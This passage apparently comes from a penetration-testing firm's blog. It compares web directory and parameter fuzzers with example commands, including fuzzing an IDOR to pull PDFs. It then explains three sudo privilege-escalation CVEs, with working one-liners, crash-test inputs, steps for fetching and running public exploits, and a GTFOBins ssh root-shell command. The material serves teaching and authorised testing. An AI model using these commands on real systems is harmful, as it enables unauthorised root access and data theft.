Finally, we can note that the option -D allow us to reuse specific Dirsearch wordlists sur as dicc.txt.

Pros#

"Replay-proxy" option which can be associated with other tools such as BurpSuite
Multi-wordlist operation modes
Colorized output
Custom / Auto filtering calibration

Cons#

lots of options, custom scan may be long to configure

Gobuster#

As indicated by his name, Gobuster is a tool written in Go. The first release of gobuster was in 2015 and the last one in October 2020. Gobuster is a powerful tool with multiple purpose :

Gobuster is a tool used to brute-force:URIs (directories and files) in websites.DNS subdomains (with wildcard support).Virtual Host names on target web servers.Open Amazon S3 buckets

As mentioned in the project description, Gobuster has been originally created to avoid Dirbuster Java GUI and that do support content discovery with multiple extensions at once.

As said in the tools description, Gobuster aim to be a simple tool without any fancy options. Note that Gobuster is provided without any wordlist.

Pros#

Multiple extensions
-d option to discover backup files
DNS, VHOST and S3 options

Cons#

No recursion
Single Wordlist
No regex match
Only one output format (TXT)

Wfuzz#

Wfuzz is a web fuzzer written in Python3 and provided by Xavi Mendez since 2014.

Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.

The tool is still maintained with a recent release in November 2020. The package is provided by most of pentesting Linux releases.

The tool is provided with a lot of wordlists: General (big.txt, common.txt, medium.txt...), Webservices (ws-dirs.txt and ws-files.txt), Injections (SQL.txt, XSS.txt, Traversal.txt...), Stress (alphanum_case.txt, char.txt...), Vulns (cgis.txt, coldfusion.txt, iis.txt...) and others.

Such as Fuff, Wfuzz replace the FUZZ keyword by a payload from a given wordlist. Wfuzz provides multiple filters including regex filters (--ss/hs) and supports multiple outputs (JSON, CSV, ...). Also, Wfuzz is one of the rarest tools to support both basic auth, NTLM auth and digest auth.

Pros#

Encoders (urlencode, base64, uri_double_hex...) and scripts
Encoding chaining
Basic/NTLM/Digest authentication
Colorized output

Cons#

Single wordlist

Bonus - BFAC#

BFAC (Backup File Artifacts Checker) is not a tool design to search for new folders, files or routes, but a tool designed to search for backup files.

BFAC (Backup File Artifacts Checker) is an automated tool that checks for backup artifacts that may disclose the web application's source code. The artifacts can also lead to leakage of sensitive information, such as passwords, directory structure, etc.The goal of BFAC is to be an all-in-one tool for backup-file artifacts black box testing.

Given a list of files URI, BFAC will attempt to recover associated backup files with a hardcoded list of tests. For example, for the file /index.php, BFAC will not only attempt to recover /index.php.swp and /index.php.tmp, but also includes tests such as /Copy_(2)_of_index.php, /index.bak1 or /index.csproj.

As you can imagine, BFAC should be used as a complement of previous tools. It supports most of the expected features such as proxy support, custom headers and different outputs.

Pros#

Complementary Tool
Efficient with fewer requests than a common web discovery tool

Cons#

Even if the tool is still maintained, the repository only provides one release

Use-cases#

Simple discovery on PHP applications#

The main use of these tools is file discovery on a common web server, such as a PHP website running on an apache2. Searching for files on this kind of web server often leads to HTTP errors such as 404 - File not found, 403 - Forbidden or HTTP success such as 200 - OK. Other HTTP status codes may be encountered, like 302 - Found, 429 - Too Many Requests, 500 - Internal Server Error...

Depending on the server configuration, an auditor may or may not include specific HTTP status code during file discovery. The default configuration on most of the tools is to hide 404 - File not found from results. Displayed status codes may vary between tools but 200 - OK is the most common displayed result.

i.e., by default, Dirsearch will print not only 200 status code but also 301, 302, etc.

1
2
3

dirsearch -u http://localhost/
dirsearch -u http://localhost/ -e php
dirsearch -u http://localhost/ -e php,php5,sql -w /usr/share/wordlists/raft-large-words.txt -f

Note : By default dirsearch only replaces the %EXT% keyword with extensions. Using -f flag will force dirsearch to add extensions for a given wordlist. This option is useless if your wordlist already contains file extensions.

The same task can be accomplished by the other tools :

dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql
gobuster dir -u http://localhost/ -w /usr/share/wordlists/raft-large-words.txt -x php,php5,sql
ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/raft-large-words.txt -e php,php5,sql
wfuzz --hc 404 -w /usr/share/wordlists/raft-large-words.txt -w exts.txt http://localhost/FUZZFUZ2Z

Webserver with a custom page for error 40X#

Sometimes, server won't reply as expected for your tools and will reply a 403 error instead of a 404 error, or worst a 200 status code with a custom error page.

In this case, the auditor must configure his tool to match with the server answer. For the 403 case, the first solution is to exclude 403 results from his tool :

dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql -N 403
dirsearch -u http://localhost/ -e php,php5,sql -w /usr/share/wordlists/raft-large-words.txt -f -x 403
gobuster dir -u http://localhost/ -w /usr/share/wordlists/raft-large-words.txt -x php,php5,sql -b 403,404
ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/raft-large-words.txt -e php,php5,sql -fc 403
wfuzz --hc 404,403 -w /usr/share/wordlists/raft-large-words.txt -w exts.txt http://localhost/FUZZFUZ2Z

With this solution the auditor may miss interesting 403 errors. The second option is to filter more precisely the content you're not looking for.

If the 403 error is a custom page or if you got a 200 status code with an error message, you may filter web pages by their content and not with their status code. Tools provide multiple way to perform that: you can either filter by page size (assuming the error page is always the same size), or you can filter per words or regex present in the web page.

i.e., if a website returns a 200 HTTP status code with an HTML page containing the sentence Page not found, you may filter with the following :

1
2
3

dirsearch -u http://localhost/ --exclude-texts="Page not found" -e php,php5,sql -w /usr/share/wordlists/raft-large-words.txt -f
ffuf -u http://localhost/FUZZ -fr "Page not found" -w /usr/share/wordlists/raft-large-words.txt -e php,php5,sql
wfuzz --hs "Page not found" --hc 404 -w /usr/share/wordlists/raft-large-words.txt -w exts.txt http://localhost/FUZZFUZ2Z

Not that this method is not available for every tool.

Fuzzing on Rest API#

With the evolution of Web development standards, auditors encounter more and more varied web routing techniques. Therefore, it's not rare that resources are accessible through dynamic routes. That's the case of RESTfull WEB API where certain resources must be fuzzed at the middle of an URI.

Let's take the example of a REST API where the route /vps/{serviceName}/ips is available with GET requests (and where the route /vps/{serviceName} doesn't exist). To enumerate this parameter, you've got 3 possibilities :

~~Reuse the previous examples and set /ips as an extension 🧐 ;~~
Use suffix option on tools if available ;
Use a dedicated fuzzing tool such as ffuf or wfuzz to perform precise parameter fuzzing (recommended).

1
2
3

[deprecated] dirsearch -u http://localhost/vps/ --suffixes /ips -w /usr/share/wordlists/raft-large-words.txt
ffuf -u http://localhost/vps/FUZZ/ips -w /usr/share/wordlists/raft-large-words.txt
wfuzz --hc 404 -w /usr/share/wordlists/raft-large-words.txt http://localhost/vps/FUZZ/ips

POST IDOR with incremental ID#

Sometimes resources location is based on a more complex parameter such as Accept-Language header, HTTP POST parameter or even IP address.

During a pentest, SEC-IT auditors encounter a vulnerability allowing users to download PDF on page /files/pdf with POST parameter {"objectId": "X"} where X is an integer. The vulnerability itself was an IDOR (Insecure Direct Object Reference) : a user could download any PDF without privilege restriction.The problem is that even if the vulnerable parameter was a pseudo-incremental ID, there was a random step between each ID which makes the exfiltration harder without any tool.

To perform this PDF exfiltrations, web fuzzer like ffuf and wfuzz can be used to fuzz the objectId POST parameter :

1
2

ffuf -u http://localhost/files/pdf -X POST -d '{"objectId" : "FUZZ"}' -w /usr/share/wordlists/ints.txt
wfuzz -z file,/usr/share/wordlists/ints.txt -d '{"objectId" : "FUZZ"}' http://localhost/files/pdf

Comparative table#

Without further ado, here is a comparative table of the different tools discussed in this post :

(open as image here)

	Dirb	Dirbuster	Dirsearch	FFUF	GoBuster	Wfuzz	Rustbuster	FinalRecon	Monsoon	BFAC
Language	C	Java	Python3	Go	Go	Python3	Rust	Python3	Go	Python3
First release	27/04/2005	2007	07/07/2014	08/11/2018	21/07/2015	23/10/2014	20/05/2019	05/05/2019	12/11/2017	08/11/2017
Last release	19/11/2014	01/05/2013	08/12/2020	24/01/2021	19/10/2020	06/11/2020	24/05/2019	23/11/2020	28/10/2020	08/11/2017
Current version	2.22	1.0-RC1	0.4.1	1.2.1	3.1.0	3.1.0	1.1.0	no versionning	0.6.0	1.0
License	GPLv2	LGPL-2	GPLv2	MIT	Apache License 2.0	GPLv2	GPLv3	MIT	MIT	GPLv3
Maintained	No	No	Yes	Yes	Yes	Yes	Yes	Yes	Yes	Yes
GUI/CLI	CLI	GUI (Java)	CLI (colorized by default)	CLI (colorize option)	CLI	CLI (colorize option)	CLI	CLI (colorized by default)	CLI (colorized by default)	CLI (colorized by default)
Profile options file	No	No but ability to modify default threads, WL and extentions	Yes (default.conf)	Yes (-config)	No	Yes (--recipe)	No	No	Yes (-f)	No
Output	No (-o, text only)	Yes (XML, CSV, TXT)	Yes (JSON, XML, MD, CSV, TXT)	Yes (JSON, EJSON, HTML, MD, CSV, ECSV)	No (-o, text only)	Yes (-o, JSON, CSV, HTML, Raw)	No (-o, text only)	Yes (-o, XML, CSV, TXT)	No (--logfile, text only)	Yes (JSON, CSV, TXT)
Multithread	No	Up to 500	Yes (-t)	Yes (-t)	Yes (-t)	Yes (-t)	Yes (-t)	Yes (-t)	Yes (-t)	Yes (--threads)
Delay	Yes (-z)	Yes (Rate limit)	Yes (-s)	Yes (-p), accept range	Yes (--delay)	Yes (-s)	No	No	Yes (--requests-per-second)	Yes (Rate limit)
Custom Timeout	No	Yes	Yes (--timeout)	Yes (-timeout)	Yes (--timeout)	Yes (--req-delay)	No	Yes (-T)	No	Yes (--timeout)
Proxy	Yes (-p/-P, socks5)	Yes (not specified, authenticated)	Yes (--proxy, http/socks5)	Yes (-x, http, see issue 50)	Yes(--proxy, http(s) )	Yes (-p) Socks4 / Socks5 / HTTP (unauthent)	No	No	Yes (SOCKS5/HTTP(s) authenticated)	Yes (--proxy, http(s)/socks5 authenticated)
Auth	Basic	Basic / Digest / NTLM	Basic with Headers	Basic with Headers	Basic (-U/-P)	Basic / Digest / NTLM	Basic with Headers	No	Basic (-u)	Basic with Headers
Default WL	common.txt (4614)	No	dicc.txt (9000)	No	No	No	No	dirb_common.txt (4614)	No	N/A
WL provided	Yes (more than 30)	Yes (8)	Yes (5)	No	No	Yes (more than 30)	No	Yes (3)	No	N/A
Recursion	By default, switch available	Yes	Yes (-r)	Yes (-recursion)	No	Yes (-R)	No	No	No	N/A
Recursion depth	No but interactive mode available	No	Yes (-R) + interactive	Yes (-recursion-depth)	N/A	Yes (-R)	N/A	N/A	N/A	N/A
Multiple URLs	No	No	Yes (-l) / CIDR	Yes (using wordlist of hosts)	No	Yes (using wordlist of hosts)	No	No	No	Yes (-L)
Multiple WL	Yes (commas separated)	No	Yes, commas seperated	Yes (repeat -w)	No	Yes (repeat -w)	Yes (for multiple Fuzzing point)	No	No	N/A
WL Manipulation	No	No	Yes (lots of transformations)	No	No	Yes (using encoders and script)	No	No	No	N/A
Encoders	No	No	No	No	No	Yes	No	No	No	N/A
Single Extension	Yes (-X/-x)	Yes	Yes (-e)	Yes (-e)	Yes (-x)	Yes	Yes (-e)	Yes (-e)	Yes	N/A
Multiple Extensions	Yes (-X/-x)	Yes (commas separated)	Yes (-e, commas separated)	Yes (-e, commas separated)	Yes (-x, commas separated)	Yes (with given wordlist)	Yes (-e, commas separated)	Yes (-e, commas separated)	No	N/A
Custom User-Agent	Yes (-a/-H)	Yes	Yes (--user-agent) + random	Yes (with header -H)	Yes (-a) + random	Yes (with header -H)	Yes (-a)	No	Yes (with header -H)	Yes (-ua)
Custom Cookie	Yes (-c/-H)	Yes (through headers)	Yes (--cookie)	Yes (with header -H)	Yes (-c)	Yes (-b)	Yes (with header -H)	No	Yes (with header -H)	Yes (--cookie)
Custom Header	Yes (-H)	Yes	Yes (-H) + Headers file	Yes (-H)	Yes (-H)	Yes (-H)	Yes (-H)	No	Yes (-H)	Yes (--headers)
Custom Method	No	No	Yes (-m)	Yes (-x)	Yes (-m)	Yes (-X)	Yes (-X)	No	Yes (-X)	No
URL fuzzing (at any point)	No	Yes	Not by design but can be bypassed using --suffixes	Yes	No	Yes	Yes (fuzz mode)	No	Yes (fuzz mode)	N/A
Post data fuzzing	No	No	No	Yes (-d)	No	Yes (-d)	Yes (fuzz mode)	No	Yes (fuzz mode)	N/A
Header fuzzing	No	No	No	Yes (-H)	No	Yes	Yes (fuzz mode)	No	Yes (fuzz mode)	N/A
Method fuzzing	No	No	No	Yes (-X FUZZ)	No	Yes (-X FUZZ)	Yes (fuzz mode)	No	Yes (fuzz mode)	N/A
Raw file ingest	No	No	Yes (--raw)	Yes (-request)	No	No	No	No	Yes (--template-file)	No
Follow redirect (302)	Yes + switch (-N)	Yes + switch	Yes (-F)	Yes (-r)	Yes (-r)	Yes (-L)	No	No	Yes (--follow-redirect)	No
Custom filters	No	No	Yes (--excludes-*, based on text, size, regex)	Yes (-m, -f, based on code, size, regex)	Limited (status code, -s/-b)	Yes (based on code, words, regex)	Yes (based on code, string)	No	Yes (size,code,regex)	Yes (code, size or both)
Backup files option	No	No	No	No	Yes (-d)	No	No	No	No	Yes
Replay proxy	No	No	Yes (--replay-proxy)	Yes (-replay-proxy)	No	No	No	No	No	No
Ignore certificate errors	By default ?	By default ?	By default	By default, (switch with -k)	Yes (-k)	By default	Yes (-k)	Yes (-s)	Yes (-k)	By default
Specify IP to connect to	No	No	Yes (--ip)	No	No	Yes (--ip)	No	No	No	No
Vhost enumeration	No	No	No	Yes	Yes	Yes	Yes	No	Yes	N/A
Subdomain enumeration	No	No	No	Yes	Yes	Yes	Yes	Yes	Yes	N/A
S3 enumeration	No	No	No	No	Yes	No	No	No	No	N/A

About the author#

This piece was written by Alex GARRIDO a.k.a. zeecka.Alex is a pentester at SEC-IT.

Website: zeecka.fr

Some sudo elevation of privilege vulnerabilities

2021-02-08T09:38:00.000Z

Software vulnerabilities#

An introduction to 3 sudo vulnerabilities: CVE-2019-14287, CVE-2019-18634, CVE-2021-3156.

Summary#

Here are the few vulnerabilities we will cover:

Vulnerability	Version	Prerequisite	Type
CVE-2019-14287	< 1.8.28	Requires permission to execute a command as another user	integer overflow, security bypass
CVE-2019-18634	< 1.8.26	Requires pwfeedback option enabled	stack-based BoF
CVE-2021-3156 (Baron Samedit)	< 1.9.5p2	None	heap-based BoF

CVE-2019-14287#

CVE-2019-14287 exploits an integer overflow in the user ID variable.

an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u #$((0xffffffff))" command.

For example, if we have the following configuration in /etc/sudoers, usersecit should be able to run any command as any user except root.

1	secit ALL=(ALL:!root) NOPASSWD: ALL

The user should see this:

$ sudo -ll
Matching Defaults entries for secit on sudo-test:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User secit may run the following commands on sudo-test:

Sudoers entry:
    RunAsUsers: ALL, !root
    Options: !authenticate
    Commands:
        /bin/bash

root has the id zero.

In pseudo-code, it can be translated to:

1 2	unless userid == 0 executeas(cmd, userid)

The well known syntax to run a command as another user is (with an example):

1 2	$ sudo -u $ sudo -u john touch /home/john/.zshrc

But it's also possible to provide the user id instead of the username:

1
2
3

$ sudo -u# 
$ sudo -u \# 
$ sudo -u \#1001 touch /home/john/.zshrc

But the user id -1 (signed int) would cause an integer overflow and betranslated as 4294967295 (0xffffffff) so the pseudo-chek userid == 0 wouldbe bypassed as we could have 4294967295 != 0.

Exploiting the vulnerability is as easy as one of the following example:

1
2
3

$ sudo -u \#-1 /bin/bash
$ sudo -u \#$((0xffffffff)) /bin/bash
$ sudo -u \#4294967295 /bin/bash

TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.

CVE-2019-18634#

CVE-2019-18634 exploits a stack-based buffer overflow in the functiongetln() from the file tgetpass.c.But this vulnerability works only if the pwfeedback option is enabled in/etc/sudoers which is not the default for upstream and most packages frommainly used linux distros. However, in 2019, Linux Mint and elementary OSwere using pwfeedback by default. pwfeedback is a display feature toshow an asterisk when an user writes a character of its password.So even at the time the vulnerability was found, it was not likely that asystem would be vulnerable to it.

Here are some commands to check if sudo is vulnerable (you should get a segmentationfault):

1
2
3

$ ruby -e 'puts ("A"*100 + "\x00")*50' | sudo -S id
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
$ python -c 'print(("A"*100 + "\x00")*50)' | sudo -S id

To exploit the vulnerability we can use a Proof of Concept (PoC) from Saleem Rashidhosted on the following git repository:saleemrashid/sudo-cve-2019-18634.

Details of the steps of exploit can be found in the comment ofexploit.c.

An easy scenario could be:

Download the source of the exploit on the target with wget
Compile the exploit directly on the target with gcc -o exploit exploit.c
Execute the exploit: ./exploit

The output should be as follows:

$ ./exploit
[sudo] password for secit:
Sorry, try again.
# id
uid=0(root) gid=0(root) groups=0(root),1000(secit)

TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.

CVE-2021-3156#

CVE-2021-3156 (a.k.a. Baron Samedit) exploits a heap-based buffer overflow.This one is way more powerful than the two previous vulnerabilities we sawearlier because it works with the default configuration and with all versionsof sudo.

Here are some commands to check if sudo is vulnerable (you should get an errormalloc(): memory corruption):

1
2
3

$ sudoedit -s '\' $(ruby -e 'puts "A"*1000')
$ sudoedit -s '\' $(perl -e 'print("A" x 1000)')
$ sudoedit -s '\' $(python -c 'print("A"*1000)')

To exploit the vulnerability we can use a Proof of Concept (PoC) from blastyhosted on the following git repository:blasty/CVE-2021-3156.

An easy scenario could be:

Download the source of the exploit (lib.c, hax.c, makefile) on the target with wget
Compile the exploit directly on the target with make
Execute the exploit: ./sudo-hax-me-a-sandwich

The output should be as follows:

$ ./sudo-hax-me-a-sandwich 0

** CVE-2021-3156 PoC by blasty 

using target: 'Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27'
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1000(secit)

TryHackMe is hosting a vulnerable environment so it's possible to try thisvulnerability in a sandbox.

Misconfiguration vulnerabilities#

Even if sudo is fully up to date and patched, a misconfiguration can opena door for the attacker.

The following config gives user secit the permission to execute ssh asanybody including root.

1	secit ALL=(ALL) /usr/bin/ssh

A lot of legitimate linux binaries can abused to bypass local security,break out restricted shells, escalate elevated privileges orfacilitate other post-exploitation tasks.

So if root permission is given via sudo to use one of this binaries, it'svery likely that an attacker could get root permission easily.

A list of those binaries can be found on GTFObins website or browsedoffline using a CLI tool like GTFOBLookup.

An example of ssh abuse:

$ gtfoblookup linux sudo ssh
ssh:

    sudo:

        Description: Spawn interactive root shell through ProxyCommand
                     option.
        Code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

There is also a Metasploit module called post/multi/recon/sudo_commands doingthe following:

This module examines the sudoers configuration for the session userand lists the commands executable via sudo. This module alsoinspects each command and reports potential avenues for privilegedcode execution due to poor file system permissions or permittingexecution of executables known to be useful for privesc, such asutilities designed for file read/write, user modification, orexecution of arbitrary operating system commands. Note, you may needto provide the password for the session user

There are great virtual environments to train exploiting those binaries andmisconfigured sudo:

the Bash - Restricted shells challenge from Root-Me
Privilege Escalation section from Linux Agency room on TryHackMe

About the author#

This piece was written by Alexandre ZANNI aka noraj.Alexandre is a pentester and a BlackArch maintainer.

Website: pwn.by/noraj